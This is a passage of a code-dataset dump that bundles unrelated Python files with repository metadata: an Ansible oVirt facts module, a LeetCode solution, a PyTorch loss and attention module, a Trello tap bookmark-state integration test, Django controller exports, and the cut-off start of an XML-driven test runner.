register_within:\n if cluster_location.endswith(\"*\"):\n cluster_location = cluster_location[:-2]\n ProcessNode.validate_conf(config, cluster_location)\n process_nodes(cluster_location, config, method, method_args)\n\n\n# From https://stackoverflow.com/a/4303996\ndef pprint_OrderedDict(object, **kwrds):\n \"\"\"\n Pretty print an OrderedDict\n\n :param object: Input container\n :type object: ```OrderedDict```\n\n :param kwrds: Keyword arguments\n :type kwrds: ```dict```\n \"\"\"\n try:\n width = kwrds[\"width\"]\n except KeyError: # unlimited, use stock function\n pprint(object, **kwrds)\n return\n buffer = StringIO()\n stream = kwrds.get(\"stream\", stdout)\n kwrds.update({\"stream\": buffer})\n pprint(object, **kwrds)\n words = buffer.getvalue().split()\n buffer.close()\n\n print(textwrap.fill(\" \".join(words), width=width), file=stream)\n\n\ndef process_nodes(cluster_location, config, method, method_args):\n \"\"\"\n Helper function that runs methods against cluster location with given config\n\n :param cluster_location: Cluster to register the node's operation to\n :type cluster_location: ```str```\n\n :param config: dictionary for config\n :type config: ```dict```\n\n :param method: Which method to run\n :type method: ```str```\n\n :param method_args: Arguments to provide to the function by the `method` 
name\n :type method_args: ```Tuple[str]```\n \"\"\"\n clustering_results = []\n if cluster_location.rpartition(\"/\")[2] == \"local\":\n nodes = (\"local\",)\n else:\n nodes = list_nodes(cluster_location, marshall=json)\n if len(nodes) == 0:\n try:\n nodes = (fetch_node(cluster_location),) # try exact match\n except StopIteration:\n raise AssertionError(\"No node found at {!r}\".format(cluster_location))\n assert len(nodes), \"No nodes found at {!r}\".format(cluster_location)\n for node_res in nodes:\n try:\n process_node_obj = ProcessNode(config, node_res, clustering_results)\n getattr(process_node_obj, method)(cluster_location, *method_args)\n clustering_results = process_node_obj.previous_clustering_results\n except CalledProcessError as e:\n root_logger.exception(e)\n\n pprint_OrderedDict(clustering_results)\n\n\nif __name__ == \"__main__\":\n args = _build_parser().parse_args()\n process_node = ProcessNode(args.config)\n\n process_within(\n args.within\n or {\n k: process_node.process_dict[\"register\"][k]\n for k in filterfalse(\n lambda key: key.startswith(\"_\"), process_node.process_dict[\"register\"]\n )\n },\n config=args.config,\n method=args.method,\n method_args=args.method_args,\n )\n","repo_name":"offscale/offregister","sub_path":"offregister/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6204,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"29367280291","text":"ANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: ovirt_host_facts\nshort_description: Retrieve facts about one or more oVirt/RHV hosts\nauthor: \"Ondra Machacek (@machacekondra)\"\nversion_added: \"2.3\"\ndescription:\n - \"Retrieve facts about one or more oVirt/RHV hosts.\"\nnotes:\n - \"This module creates a new top-level C(ovirt_hosts) fact, which\n contains a list of hosts.\"\noptions:\n pattern:\n description:\n - \"Search term which is accepted by oVirt/RHV search backend.\"\n - \"For example to search host X from datacenter Y use following pattern:\n name=X and datacenter=Y\"\n all_content:\n description:\n - \"If I(true) all the attributes of the hosts should be\n included in the response.\"\n default: False\n version_added: \"2.7\"\n type: bool\nextends_documentation_fragment: ovirt_facts\n'''\n\nEXAMPLES = '''\n# Examples don't contain auth parameter for simplicity,\n# look at ovirt_auth module to see how to reuse authentication:\n\n# Gather facts about all hosts which names start with C(host) and\n# belong to data center C(west):\n- ovirt_host_facts:\n pattern: name=host* and datacenter=west\n- debug:\n var: ovirt_hosts\n'''\n\nRETURN = '''\novirt_hosts:\n description: \"List of dictionaries describing the hosts. 
Host attributes are mapped to dictionary keys,\n all hosts attributes can be found at following url: http://ovirt.github.io/ovirt-engine-api-model/master/#types/host.\"\n returned: On success.\n type: list\n'''\n\nimport traceback\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.ovirt import (\n check_sdk,\n create_connection,\n get_dict_of_struct,\n ovirt_facts_full_argument_spec,\n)\n\n\ndef main():\n argument_spec = ovirt_facts_full_argument_spec(\n pattern=dict(default='', required=False),\n all_content=dict(default=False, type='bool'),\n )\n module = AnsibleModule(argument_spec)\n\n if module._name == 'ovirt_hosts_facts':\n module.deprecate(\"The 'ovirt_hosts_facts' module is being renamed 'ovirt_host_facts'\", version=2.8)\n\n check_sdk(module)\n\n try:\n auth = module.params.pop('auth')\n connection = create_connection(auth)\n hosts_service = connection.system_service().hosts_service()\n hosts = hosts_service.list(\n search=module.params['pattern'],\n all_content=module.params['all_content'],\n )\n module.exit_json(\n changed=False,\n ansible_facts=dict(\n ovirt_hosts=[\n get_dict_of_struct(\n struct=c,\n connection=connection,\n fetch_nested=module.params.get('fetch_nested'),\n attributes=module.params.get('nested_attributes'),\n ) for c in hosts\n ],\n ),\n )\n except Exception as e:\n module.fail_json(msg=str(e), exception=traceback.format_exc())\n finally:\n connection.close(logout=auth.get('token') is None)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"amitvashist7/ansible-development-CTS","sub_path":"molecule/my_env/lib/python2.7/site-packages/ansible/modules/cloud/ovirt/_ovirt_hosts_facts.py","file_name":"_ovirt_hosts_facts.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"9364951389","text":"#\n# @lc app=leetcode.cn id=482 lang=python3\n#\n# [482] 密钥格式化\n#\n\n# @lc code=start\nclass Solution:\n def licenseKeyFormatting(self, S: str, K: int) -> str:\n S = S.upper().replace(\"-\",\"\")\n mod = len(S)% K\n result = \"\"\n if mod:\n result += S[:mod]+\"-\"\n for x in range(mod,len(S),K):\n result += S[x:x+K] +\"-\"\n result = result[:-1]\n return result\n# @lc code=end\n\n","repo_name":"mqinbin/python_leetcode","sub_path":"482.密钥格式化.py","file_name":"482.密钥格式化.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1205282928","text":"import torch\nfrom torch.nn import CrossEntropyLoss\nimport torch.nn.functional as F\n\n\nfrom config import * #SPECIAL TOKENS\n\ndef get_loss(ignore_index=PAD_TOKEN, smooth=0):\n return CELoss(ignore_index=ignore_index, smooth=smooth)\n\n\n\nclass CELoss(CrossEntropyLoss):\n def __init__(self, ignore_index=0, smooth=0):\n super().__init__(ignore_index=ignore_index)\n self.smooth = smooth\n\n def forward(self, pred, trg):\n if pred.nelement() == 0 or trg.nelement()==0:\n return None\n pred = pred.contiguous().view(-1, pred.shape[-1])\n trg = trg.contiguous().view(-1)\n\n if self.smooth>0:\n n_class = pred.shape[1]\n onehot = torch.zeros_like(pred).scatter(1,trg.view(-1,1), 1)\n onehot = onehot *( 1- self.smooth) + (1-onehot) *self.smooth / (n_class-1) # -1 for original target\n logprob = F.log_softmax(pred, dim=1)\n\n donotpad = (trg!=PAD_TOKEN)\n loss = -(onehot * logprob).sum(dim=1)\n loss = loss.masked_select(donotpad).mean()\n else:\n loss = super().forward(pred, trg)\n\n return 
loss\n","repo_name":"sonsus/papago_test","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17074962269","text":"import os\nimport logging\nimport unittest\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nfrom functools import reduce\n\nimport tap_tester.connections as connections\nimport tap_tester.menagerie as menagerie\nimport tap_tester.runner as runner\nimport trello_utils as utils\n\n\nclass TrelloBookmarkStates(unittest.TestCase):\n START_DATE = \"\"\n START_DATE_FORMAT = \"%Y-%m-%dT00:00:00Z\"\n TEST_TIME_FORMAT = \"%Y-%m-%dT%H:%M:%S.%fZ\"\n LOOKBACK_WINDOW = 1 # days\n TEST_BOARD_ID = utils.NEVER_DELETE_BOARD_ID\n\n \"\"\"\n Below we define the formatting for the various bookmark states. The actual values\n are set in the test. These states should be considered as different possibilities\n for a given sync NOT as continuations of each other.\n e.g. sync_0 is a standard sync, sync_1 simulates a killed job in the middle of a sync\n \"\"\"\n ACTIONS_STATES = {\n \"state_0\": { # Final state after standard sync\n \"window_start\": 0,\n },\n \"state_1\": { # State of interrupted sync for Inc streams\n \"parent_id\": TEST_BOARD_ID,\n \"window_start\": 0, \"sub_window_end\": 0, \"window_end\": 0\n },\n \"state_2\": { # State of interrupted sync for Full Table streams\n \"window_start\": 0, \"window_end\": 0,\"parent_id\": TEST_BOARD_ID\n },\n }\n\n def setUp(self):\n missing_envs = [x for x in [\n \"TAP_TRELLO_CONSUMER_KEY\",\n \"TAP_TRELLO_CONSUMER_SECRET\",\n \"TAP_TRELLO_ACCESS_TOKEN\",\n \"TAP_TRELLO_ACCESS_TOKEN_SECRET\",\n ] if os.getenv(x) == None]\n if len(missing_envs) != 0:\n raise Exception(\"Missing environment variables: {}\".format(missing_envs))\n\n def name(self):\n return \"tap_tester_trello_bookmark_states\"\n\n def get_type(self):\n return \"platform.trello\"\n\n def get_credentials(self):\n return {\n 'consumer_key': os.getenv('TAP_TRELLO_CONSUMER_KEY'),\n 'consumer_secret': os.getenv('TAP_TRELLO_CONSUMER_SECRET'),\n 'access_token': os.getenv('TAP_TRELLO_ACCESS_TOKEN'),\n 'access_token_secret': os.getenv('TAP_TRELLO_ACCESS_TOKEN_SECRET'),\n }\n\n def get_tap_sorted_stream(self, stream: str = 'boards'):\n \"\"\"The tap sorts parent objects in created at ascending order\"\"\"\n objs = utils.get_objects(obj_type=stream)\n obj_id_list = [obj.get('id') for obj in objs]\n\n id_created_dict = {obj_id: dt.fromtimestamp(int(obj_id[0:8],16))\n for obj_id in obj_id_list}\n\n return sorted(id_created_dict.items())\n\n def untestable_streams(self):\n return {\n 'users',\n 'boards'\n }\n\n def expected_check_streams(self):\n return {\n 'actions',\n 'boards',\n 'cards',\n 'checklists',\n 'lists',\n 'users'\n }\n\n def expected_sync_streams(self):\n return self.expected_check_streams()\n\n def expected_full_table_sync_streams(self):\n return {\n 'boards',\n 'cards',\n 'checklists',\n 'lists',\n 'users',\n }\n\n def expected_incremental_sync_streams(self):\n return {\n 'actions'\n }\n\n def tap_name(self):\n return \"tap-trello\"\n\n def expected_pks(self):\n return {\n 'boards' : {'id'},\n 'users' : {'id', 'boardId'},\n 'lists' : {'id'},\n 'actions' : {'id'},\n 'cards' : {'id'},\n 'checklists': {'id'}\n }\n\n def expected_automatic_fields(self):\n return {\n 'boards' : {'id'},\n 'users' : {'id', 'boardId'},\n 'lists' : {'id'},\n 'actions' : {'id', 'date'},\n 'cards' : {'id'},\n 'checklists': {'id'}\n }\n\n def 
get_properties(self):\n return {\n 'start_date' : dt.strftime(dt.utcnow() - timedelta(days=2), self.START_DATE_FORMAT), # set to utc today\n }\n\n def get_states_formatted(self, index: int):\n state_index = \"state_{}\".format(index)\n states = { \"bookmarks\": { \"actions\": self.ACTIONS_STATES[state_index]}}\n for stream in self.expected_incremental_sync_streams().difference({'boards'}):\n states['bookmarks'][stream] = dict()\n return states\n\n def test_run(self):\n print(\"\\n\\nRUNNING {}\\n\\n\".format(self.name()))\n\n # Initialize start date prior to first sync\n self.START_DATE = self.get_properties().get('start_date')\n\n # ensure data exists for sync streams and set expectations\n records_to_create = 3\n expected_records = {x: [] for x in self.expected_sync_streams()} # ids by stream\n for stream in self.expected_sync_streams().difference(self.untestable_streams()):\n if stream in self.expected_incremental_sync_streams():\n since = dt.strptime(self.START_DATE, self.START_DATE_FORMAT).strftime(self.TEST_TIME_FORMAT)\n _, existing_objects = utils.get_total_record_count_and_objects(stream, since=since)\n else:\n _, existing_objects = utils.get_total_record_count_and_objects(stream)\n\n if existing_objects:\n logging.info(\"Data exists for stream: {}\".format(stream))\n for obj in existing_objects: # add existing records to expectations\n expected_records[stream].append(\n {field: obj.get(field)\n for field in self.expected_automatic_fields().get(stream)}\n )\n else:\n logging.info(\"Data does not exist for stream: {}\".format(stream))\n while len(expected_records.get(stream)) < records_to_create:\n # Create more records if necessary\n new_object = utils.create_object(stream)\n logging.info(\"Data generated for stream: {}\".format(stream))\n expected_records[stream].append({field: new_object.get(field)\n for field in self.expected_automatic_fields().get(stream)})\n\n # run in check mode\n conn_id = connections.ensure_connection(self)\n check_job_name = runner.run_check_mode(self, conn_id)\n\n #verify check exit codes\n exit_status = menagerie.get_exit_status(conn_id, check_job_name)\n menagerie.verify_check_exit_status(self, exit_status, check_job_name)\n\n found_catalogs = menagerie.get_catalogs(conn_id)\n self.assertGreater(len(found_catalogs), 0, msg=\"unable to locate schemas for connection {}\".format(conn_id))\n\n found_catalog_names = set(map(lambda c: c['tap_stream_id'], found_catalogs))\n\n diff = self.expected_check_streams().symmetric_difference( found_catalog_names )\n self.assertEqual(len(diff), 0, msg=\"discovered schemas do not match: {}\".format(diff))\n print(\"discovered schemas are OK\")\n\n #select all catalogs\n for c in found_catalogs:\n catalog_entry = menagerie.get_annotated_schema(conn_id, c['stream_id'])\n\n for k in self.expected_automatic_fields()[c['stream_name']]:\n mdata = next((m for m in catalog_entry['metadata']\n if len(m['breadcrumb']) == 2 and m['breadcrumb'][1] == k), None)\n print(\"Validating inclusion on {}: {}\".format(c['stream_name'], mdata))\n self.assertTrue(mdata and mdata['metadata']['inclusion'] == 'automatic')\n\n connections.select_catalog_and_fields_via_metadata(conn_id, c, catalog_entry)\n \n #clear state\n menagerie.set_state(conn_id, {})\n\n # Run sync\n sync_job_name = runner.run_sync_mode(self, conn_id)\n\n #verify tap and target exit codes\n exit_status = menagerie.get_exit_status(conn_id, sync_job_name)\n menagerie.verify_sync_exit_status(self, exit_status, sync_job_name)\n\n # verify data was replicated\n 
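# examine_target_output_file returns a per-stream record-count map (illustrative shape: {'actions': 12, 'boards': 3, ...}),\n        # which is reduced to a total row count below.\n        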
record_count_by_stream = runner.examine_target_output_file(\n            self, conn_id, self.expected_sync_streams(), self.expected_pks())\n        replicated_row_count = reduce(lambda accum,c : accum + c, record_count_by_stream.values())\n        self.assertGreater(replicated_row_count, 0,\n                           msg=\"failed to replicate any data: {}\".format(record_count_by_stream))\n        print(\"total replicated row count: {}\".format(replicated_row_count))\n        synced_records = runner.get_records_from_target_output()\n\n        # Verify bookmarks were saved for all streams\n        state = menagerie.get_state(conn_id)\n        for stream in self.expected_incremental_sync_streams():\n            self.assertTrue(state.get('bookmarks', {}).get(stream, {}).get('window_start', {}))\n        print(\"Bookmarks meet expectations\")\n\n        # Grab the empty formatted states to test\n        states_to_test = [self.get_states_formatted(i) for i in range(len(self.ACTIONS_STATES))]\n\n        ##########################################################################\n        ### Testing standard sync state_0\n        ##########################################################################\n        version_0 = menagerie.get_state_version(conn_id)\n\n        # Set window_start to start_date \n        window_start_0 = dt.strptime(self.START_DATE, self.START_DATE_FORMAT)\n        states_to_test[0]['bookmarks']['actions']['window_start'] = window_start_0.strftime(self.TEST_TIME_FORMAT)\n\n        print(\"Interjecting test state:\\n{}\".format(states_to_test[0]))\n        menagerie.set_state(conn_id, states_to_test[0], version_0)\n\n        # Run another sync\n        print(\"Running sync job 0\")\n        sync_job_name_0 = runner.run_sync_mode(self, conn_id)\n\n        #verify tap and target exit codes\n        exit_status_0 = menagerie.get_exit_status(conn_id, sync_job_name_0)\n        menagerie.verify_sync_exit_status(self, exit_status_0, sync_job_name_0)\n\n        # verify data was replicated\n        record_count_by_stream_0 = runner.examine_target_output_file(\n            self, conn_id, self.expected_sync_streams(), self.expected_pks()\n        )\n        replicated_row_count_0 = reduce(lambda accum,c : accum + c, record_count_by_stream_0.values())\n        self.assertGreater(replicated_row_count_0, 0,\n                           msg=\"failed to replicate any data: {}\".format(record_count_by_stream_0))\n        print(\"total replicated row count: {}\".format(replicated_row_count_0))\n        synced_records_0 = runner.get_records_from_target_output()\n\n        # Test state_0\n        print(\"Testing State 0\")\n        state_0 = menagerie.get_state(conn_id)\n        for stream in self.expected_incremental_sync_streams():\n            # Verify bookmarks were saved as expected inc streams\n            self.assertTrue(state_0.get('bookmarks', {}).get(stream, {}).get('window_start', {}))\n            print(\"Bookmarks meet expectations\")\n        for stream in self.expected_sync_streams().difference(self.untestable_streams()):\n            data = synced_records.get(stream)\n            record_messages = [set(row['data']) for row in data['messages']]\n\n            data_0 = synced_records_0.get(stream)\n            record_messages_0 = [set(row['data']) for row in data_0['messages']]\n\n            # Verify we got the same number of records as the first sync\n            self.assertEqual(record_count_by_stream_0.get(stream), record_count_by_stream.get(stream),\n                             msg=\"Syncs should replicate the same number of records\")\n            self.assertEqual(record_messages_0, record_messages,\n                             msg=\"Syncs should replicate the same records\")\n\n            # Verify we got the exact same records as the first sync\n            for record_message in record_messages:\n                self.assertTrue(record_message in record_messages_0,\n                                msg=\"Expected {} to be in this sync.\".format(record_message))\n\n        
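# Per ACTIONS_STATES above, state_1 mimics a sync killed mid-board: parent_id marks the board in\n        # flight, while window_start/sub_window_end/window_end bound the date window being synced,\n        # e.g. {'bookmarks': {'actions': {'parent_id': ..., 'window_start': ..., 'sub_window_end': ..., 'window_end': ...}}}\n        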
##########################################################################\n        ### Testing interrupted sync state_1 with date-windowing\n        ##########################################################################\n        version_1 = menagerie.get_state_version(conn_id)\n\n        # Set parent_id to id of second-to-last board the tap will replicate\n        sorted_parent_objs = self.get_tap_sorted_stream()\n        penultimate_created_parent_id, _ = sorted_parent_objs[-2]\n        last_created_parent_id, _ = sorted_parent_objs[-1]\n        states_to_test[1]['bookmarks']['actions']['parent_id'] = penultimate_created_parent_id\n\n        # Set window_end based off current time\n        window_end_1 = dt.utcnow().strftime(self.TEST_TIME_FORMAT)\n        # window_end_1 = state['bookmarks']['actions']['window_start']\n        states_to_test[1]['bookmarks']['actions']['window_end'] = window_end_1\n\n        # Set sub_window_end to today\n        sub_window_end_1 = dt.strptime(self.START_DATE, self.START_DATE_FORMAT) + timedelta(days=2)\n        states_to_test[1]['bookmarks']['actions']['sub_window_end'] = sub_window_end_1.strftime(self.TEST_TIME_FORMAT)\n\n        # Set window_start to start_date\n        window_start_1 = dt.strptime(self.START_DATE, self.START_DATE_FORMAT)\n        states_to_test[1]['bookmarks']['actions']['window_start'] = window_start_1.strftime(self.TEST_TIME_FORMAT)\n\n        print(\"Interjecting test state:\\n{}\".format(states_to_test[1]))\n        menagerie.set_state(conn_id, states_to_test[1], version_1)\n\n        # Run another sync (state_1)\n        print(\"Running sync job 1\")\n        sync_job_name_1 = runner.run_sync_mode(self, conn_id)\n\n        #verify tap and target exit codes\n        exit_status_1 = menagerie.get_exit_status(conn_id, sync_job_name_1)\n        menagerie.verify_sync_exit_status(self, exit_status_1, sync_job_name_1)\n\n        # verify data was replicated\n        record_count_by_stream_1 = runner.examine_target_output_file(\n            self, conn_id, self.expected_sync_streams(), self.expected_pks()\n        )\n        replicated_row_count_1 = reduce(lambda accum,c : accum + c, record_count_by_stream_1.values())\n        self.assertGreater(replicated_row_count_1, 0,\n                           msg=\"failed to replicate any data: {}\".format(record_count_by_stream_1))\n        print(\"total replicated row count: {}\".format(replicated_row_count_1))\n\n        synced_records_1 = runner.get_records_from_target_output()\n        \n        # Test state_1\n        print(\"Testing State 1\")\n        state_1 = menagerie.get_state(conn_id)\n        for stream in self.expected_incremental_sync_streams():\n            # Verify bookmarks were saved as expected inc streams\n            self.assertTrue(state_1.get('bookmarks', {}).get(stream, {}).get('window_start', {}))\n            print(\"Bookmarks for {} meet expectations\".format(stream))\n\n            # Verify the original sync catches more data since current test state bookmarks on the second most recent board\n            self.assertGreater(record_count_by_stream.get(stream, 0),\n                               record_count_by_stream_1.get(stream, 0),\n                               msg=\"Expected to have more records for {}\".format(stream)\n                               )\n\n            # Verify sync 1 only replicates data from the bookmarked parent object (the most recently created board)\n            records_last_board = utils.get_objects(stream, parent_id=last_created_parent_id, since=window_start_1)\n            record_count_last_board = len(records_last_board)\n\n            records_penult_window_start = utils.get_objects(stream, parent_id=penultimate_created_parent_id, since=window_start_1)\n            record_count_penult_window_start = len(records_penult_window_start)\n\n            records_penult_sub_window = utils.get_objects(stream, parent_id=penultimate_created_parent_id, since=sub_window_end_1)\n            record_count_penult_sub_window = len(records_penult_sub_window)\n\n            
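# Count in [window_start, sub_window_end) = (count since window_start) - (count since sub_window_end).\n            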
record_count_penult_board = record_count_penult_window_start - record_count_penult_sub_window\n            for record in records_penult_sub_window: # records_penult_window_start - records_penult_sub_window\n                for rec in records_penult_window_start:\n                    if record.get('id') == rec.get('id'):\n                        records_penult_window_start.remove(rec)\n                        break\n\n            assert record_count_penult_board == len(records_penult_window_start)\n            expected_record_count_1 = record_count_penult_board + record_count_last_board\n            # expected_records_1 = records_last_board + records_penult_window_start SEE FOR LOOPS\n\n            synced_actions = synced_records_1.get(stream)\n            actual_data = [row.get('data').get('id') for row in synced_actions['messages']]\n\n            for record in records_last_board:\n                if record.get('id') in actual_data:\n                    continue\n                print(\"MISSING RECORD {}\".format(record))\n\n            for record in records_penult_window_start:\n                if record.get('id') in actual_data:\n                    continue\n                print(\"MISSING RECORD {}\".format(record))\n\n            self.assertEqual(expected_record_count_1, record_count_by_stream_1.get(stream, 0),\n                             msg=\"Sync 1 should only replicate data from the most recently created board.\")\n\n        ##########################################################################\n        ### Testing interrupted sync state_2 without date-windowing\n        ##########################################################################\n        version_2 = menagerie.get_state_version(conn_id)\n\n        # Set parent_id to id of last board the tap will replicate\n        # Set window_end based off current time\n        window_end_2 = dt.utcnow().strftime(self.TEST_TIME_FORMAT)\n        # Set window_start to today at midnight\n        window_start_2 = dt.strptime(self.START_DATE, self.START_DATE_FORMAT) + timedelta(days=2)\n        states_to_test[2]['bookmarks']['actions'] = {}\n        for stream in self.expected_full_table_sync_streams().difference({'boards'}):\n            states_to_test[2]['bookmarks'][stream] = {'window_start': window_start_2.strftime(self.TEST_TIME_FORMAT),\n                                                      'window_end': window_end_2,\n                                                      'parent_id': last_created_parent_id}\n\n        print(\"Interjecting test state:\\n{}\".format(states_to_test[2]))\n        menagerie.set_state(conn_id, states_to_test[2], version_2)\n\n        # Run another sync\n        print(\"Running sync job 2\")\n        sync_job_name_2 = runner.run_sync_mode(self, conn_id)\n\n        #verify tap and target exit codes\n        exit_status_2 = menagerie.get_exit_status(conn_id, sync_job_name_2)\n        menagerie.verify_sync_exit_status(self, exit_status_2, sync_job_name_2)\n\n        # verify data was replicated\n        record_count_by_stream_2 = runner.examine_target_output_file(\n            self, conn_id, self.expected_sync_streams(), self.expected_pks()\n        )\n        replicated_row_count_2 = reduce(lambda accum,c : accum + c, record_count_by_stream_2.values())\n        self.assertGreater(replicated_row_count_2, 0,\n                           msg=\"failed to replicate any data: {}\".format(record_count_by_stream_2))\n        print(\"total replicated row count: {}\".format(replicated_row_count_2))\n        synced_records_2 = runner.get_records_from_target_output()\n\n        # Test state_2\n        print(\"Testing State 2\")\n        state_2 = menagerie.get_state(conn_id)\n        for stream in self.expected_full_table_sync_streams().difference(self.untestable_streams()):\n            # Verify bookmarks were saved as expected inc streams\n            self.assertTrue(state_2.get('bookmarks', {}).get(stream, {}).get('window_start', {}),\n                            msg=\"{} should have a bookmark value\".format(stream))\n            print(\"Bookmarks meet expectations\")\n\n            # Verify the smaller window replicates less data \n            self.assertLessEqual(record_count_by_stream_2.get(stream, 0),\n                                 record_count_by_stream.get(stream, 
0),\n                                 msg=\"Expected to have more records for {}\".format(stream)\n            )\n\n            # Verify the actions from today are caught in this sync\n            expected_record_count_2 = len(utils.get_objects(stream, parent_id=last_created_parent_id))\n            self.assertEqual(expected_record_count_2, record_count_by_stream_2.get(stream, 0),\n                             msg=\"Should replicate exactly the records belonging to the bookmarked parent object.\")\n\n        ##########################################################################\n        ### CLEAN UP\n        ##########################################################################\n        stream_to_delete = 'boards'\n        boards_remaining = 5\n        print(\"Deleting all but {} records for stream {}.\".format(boards_remaining, stream_to_delete))\n        board_count = len(expected_records.get(stream_to_delete, []))\n        for obj_to_delete in expected_records.get(stream_to_delete, []): # Delete all boards between syncs\n            if board_count > boards_remaining:\n                utils.delete_object(stream_to_delete, obj_to_delete.get('id'))\n                board_count -= 1\n            else:\n                break\n\n        # Reset the parent objects that we have been tracking\n        utils.reset_tracked_parent_objects()\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"singer-io/tap-trello","sub_path":"tests/test_trello_bookmark_states.py","file_name":"test_trello_bookmark_states.py","file_ext":"py","file_size_in_byte":21629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"17865720046","text":"from .authentication import authentication_controller, logout_controller\nfrom .index import index_controller\nfrom .notification import get_user_notifications_controller\nfrom .profile import (\n    adding_a_follower_profile_controller,\n    edit_field_profile_controller,\n    follower_profile_removal_controller,\n    get_followers_profile_controller,\n    my_profile_controller,\n    profile_edit_controller,\n    profile_users_controller,\n    receiving_profile_followings_controller,\n)\nfrom .registration import (\n    registration_confirmations_controller,\n    registrations_controller,\n)\nfrom .search_twit_by_tag import get_twits_by_tag_controller\nfrom .trending_in_your_country import trending_in_your_country_controller\nfrom .twits import (\n    add_a_twits_controller,\n    create_answer_to_twit_controller,\n    edit_twit_controller,\n    twit_deletion_controller,\n    view_twits_controller,\n)\nfrom .twits_likes import add_like_the_twit_controller, deleting_a_twit_likes_controller\nfrom .twits_repost import (\n    adding_a_tweet_repost_controller,\n    twit_repost_deletion_controller,\n)\n\n__all__ = [\n    \"index_controller\",\n    \"registrations_controller\",\n    \"authentication_controller\",\n    \"logout_controller\",\n    \"profile_users_controller\",\n    \"receiving_profile_followings_controller\",\n    \"get_followers_profile_controller\",\n    \"profile_edit_controller\",\n    \"edit_field_profile_controller\",\n    \"adding_a_follower_profile_controller\",\n    \"add_a_twits_controller\",\n    \"view_twits_controller\",\n    \"twit_deletion_controller\",\n    \"add_like_the_twit_controller\",\n    \"adding_a_tweet_repost_controller\",\n    \"create_answer_to_twit_controller\",\n    \"edit_twit_controller\",\n    \"registration_confirmations_controller\",\n    \"deleting_a_twit_likes_controller\",\n    \"twit_repost_deletion_controller\",\n    \"follower_profile_removal_controller\",\n    \"my_profile_controller\",\n    \"get_twits_by_tag_controller\",\n    \"trending_in_your_country_controller\",\n    
\"get_user_notifications_controller\",\n]\n","repo_name":"EugeniRosh/microblogging","sub_path":"src/microblogging/core/presentation/views/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39189610907","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport math\nimport random\n\nfrom dataset import START, PAD\n\nclass TUBEPosBias(nn.Module):\n def __init__(self, q_channels, k_channels, head_num=8, dropout=0.1):\n super(TUBEPosBias, self).__init__()\n\n self.q_channels = q_channels\n self.k_channels = k_channels\n self.head_dim = q_channels // head_num\n self.head_num = head_num\n\n self.q_linear = nn.Linear(q_channels, self.head_num * self.head_dim)\n self.k_linear = nn.Linear(k_channels, self.head_num * self.head_dim)\n\n self.temperature = 2 * (self.head_num * self.head_dim) ** 0.5\n\n def forward(self, q, k):\n # q [B, Q_LEN, Q_DIM]\n # k [B, K_LEN, K_DIM]\n # attn_bias [B, HEAD_NUM, Q_LEN, K_LEN]\n b, q_len, k_len = q.size(0), q.size(1), k.size(1)\n q = (\n self.q_linear(q)\n .reshape(b, q_len, self.head_num, self.head_dim)\n .transpose(1, 2)\n ) # [B, HEAD_NUM, Q_LEN, HEAD_DIM]\n k = (\n self.k_linear(k)\n .reshape(b, k_len, self.head_num, self.head_dim)\n .transpose(1, 2)\n )\n\n\n attn = torch.matmul(q, k.transpose(2, 3)) / self.temperature\n\n return attn # [B, HEAD_NUM, Q_LEN, K_LEN]\n\n","repo_name":"bcaitech1/p4-fr-p4_ocr_aljalddakggalssen","sub_path":"gj/code/networks/TUBE.py","file_name":"TUBE.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74691690435","text":"from __future__ import print_function\nimport xml.etree.ElementTree as ET\nfrom check import *\nfrom csvoutput import *\nfrom run import *\nfrom regression import *\nimport variables as v\n\n\ndef getXmlProperties(root, args):\n \"\"\" Get option flags values from the xml input file.\n\n Arguments:\n root (namespace): tree representation of the xml file.\n args (namespace): option flags values.\n \"\"\"\n\n properties = []\n\n for prop in root.iter('property'):\n if prop.get('value') == 'True':\n value = True\n elif prop.get('value') == 'False':\n value = False\n else:\n if (prop.get('name') == 'exclude-modules' or\n prop.get('name') == 'cover-filter'):\n value = prop.get('value').split()\n else:\n value = prop.get('value')\n\n setattr(args, prop.get('name').replace('-', '_'), value)\n\n\ndef getTestSuitesFromXml(root, args):\n \"\"\" Get test suites and their flags from the xml input file.\n\n Arguments:\n root (namespace): tree representation of the xml file.\n args (namespace): option flags values.\n\n Returns:\n test_suites (str list): paths to the test suites.\n flags (str list): flags of each test suite.\n env_variables (str list): environment variables to set before\n executing the test.\n \"\"\"\n\n test_suites = []\n flags = []\n test_suite_flag = []\n env_variables = []\n names = []\n\n for test_suite in root.iter('testsuite'):\n test_suites.append(test_suite.get('path'))\n flags.append([test_suite.get('flags')])\n names.append(test_suite.get('name'))\n env_dict = {}\n for env in test_suite.get('env_variables').split(';'):\n split_pos = env.find('=')\n key = env[:split_pos]\n if key:\n env_dict[key] = env[split_pos + 1:]\n env_variables.append(env_dict)\n\n for i, test_suite in enumerate(test_suites):\n 
